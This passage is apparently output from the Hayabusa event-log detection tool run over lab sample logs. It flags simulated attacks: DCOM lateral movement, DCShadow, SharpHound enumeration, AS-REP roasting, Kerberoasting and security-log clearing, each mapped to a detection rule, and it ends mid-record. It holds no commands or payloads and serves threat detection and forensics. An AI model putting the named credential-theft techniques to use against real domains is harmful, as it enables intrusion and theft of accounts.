execution.evtx -2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: 
null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : 
File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network 
Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 
0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.980 
+09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : 
Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge 
Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 
